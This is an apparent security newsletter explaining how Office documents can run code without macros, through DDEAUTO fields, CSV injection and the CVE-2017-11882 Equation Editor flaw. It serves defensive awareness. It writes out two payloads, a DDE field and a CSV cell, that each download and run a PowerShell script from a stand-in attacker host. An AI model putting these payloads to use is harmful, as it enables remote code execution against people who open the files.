This newsletter will give you an overview of different threats based on Microsoft Office documents able to execute malicious code without using macros. While some of the presented attacks rely on vulnerabilities already patched by Microsoft, others take advantage of legitimate features, and as such can only be mitigated, not completely disabled.
Macros are dangerous, you can block them
It is a well-known fact that malwares have been able to hide themselves in Office documents’ macros for several years now. Office documents are often used as vector for malware spreading because the Office suite is widely deployed in enterprise environment. It is easy to create documents that look familiar, such as reports, invoices or spreadsheets, and thus will be trusted by the victims. Furthermore, as macros are commonly used on day-to-day work, they are likely to be executed automatically or the victim will just enable them.
Macros are written in Visual Basic, which offers the basic functions of any programing language, and is not limited to the document: commands can also be executed on the system itself. A successful attack is often multi-staged, first abusing the victim’s trust to activate the macro, then relying on Visual Basic functions to download and install tools that are more sophisticated, making it easier to achieve nefarious purposes.
To protect yourself against these attacks, one recommendation is to block Office documents containing macros at your mail gateway’s level. This drastically limits the risk of infection from this vector. Another recommendation is to allow only a trust list of macro signed digitally to run in the organization.
Macros are blocked… and now?
While macros are still popular, there are many other possibilities to execute arbitrary code using Office documents without relying on them. We will now describe three examples of such methods.
DDEAUTO
Dynamic Data Exchange (DDE) is a Microsoft feature that allows applications to share data and memory. Using this feature does not require macros, and will not present a security warning to the user. The only indication for the user will be a popup requesting permission to auto update the links of the document.
An attacker could for example create a malicious Word document, containing a Formula Field with the following payload:
{DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('
http://server.evil/exploit.ps1');powershell
-e $e"}
When opening the document, Word will try to update “links” and ask the user’s permission to launch cmd.exe. If the user accepts, a command will be launched on the targeted host, downloading a PowerShell script and executing it. This script can be, for example, a ransomware encrypting all the workstation and shared documents, or a Remote Access Trojan (RAT) leading to the total control of the workstation by the attacker.
The most worrying point with this kind of attacks is that they are not limited to Office documents. As DDE payloads can also be executed in Outlook messaging, an email or a calendar invitation is enough to trigger malicious code. An attacker can therefore target a company via a phishing campaign without needing any suspicious attachment.
CSV injection
On windows, a Comma Separated Value file (CSV) is opened by default with Microsoft Excel. When Excel opens the document, it will parse it to split it in different columns. During this operation, cells interpreted as formula might cause the execution of a command by Excel.
This attack, called CSV injection was first discovered by Context Information Security in 2014. Any cell beginning with the sign Equal “=”, Plus “+”, Minus “=” or At “@” can be used to trigger it.
For example, considering the following CSV:
UserId;BillToDate;ProjectName;DurationMinutes 1;2017-07-25;Test Project;60 2;2017-07-25;@SUM(1+2+3)+cmd|' /C powershell IEX(wget
http://server.evil/exploit.ps1)'!A0
"; 240
Opened with Excel, the payload will download and execute a malicious PowerShell code hosted on a website controlled by the attacker. Once again, the PowerShell can be a ransomware, a RAT, or anything malicious.
Microsoft Equation Editor [CVE-2017-11882]
A vulnerability has been found recently by researchers in a legacy component of Microsoft Word, the Microsoft Equation Editor. This component is used to insert and edit equations in documents. In Microsoft Office 2007, a new equation editor was added, but the legacy one was kept to ensure compatibility with older documents.
This vulnerability relies on Object Linking and Embedding (OLE), a Microsoft system that embeds and links objects in a document. The researchers found a way to forge an Office document that Microsoft Word will fail to open properly and leads to the execution of arbitrary code.
This vulnerability was fixed by Microsoft (see references [3] for more details) but it is worth knowing that some forgotten components may lead to complete compromising.
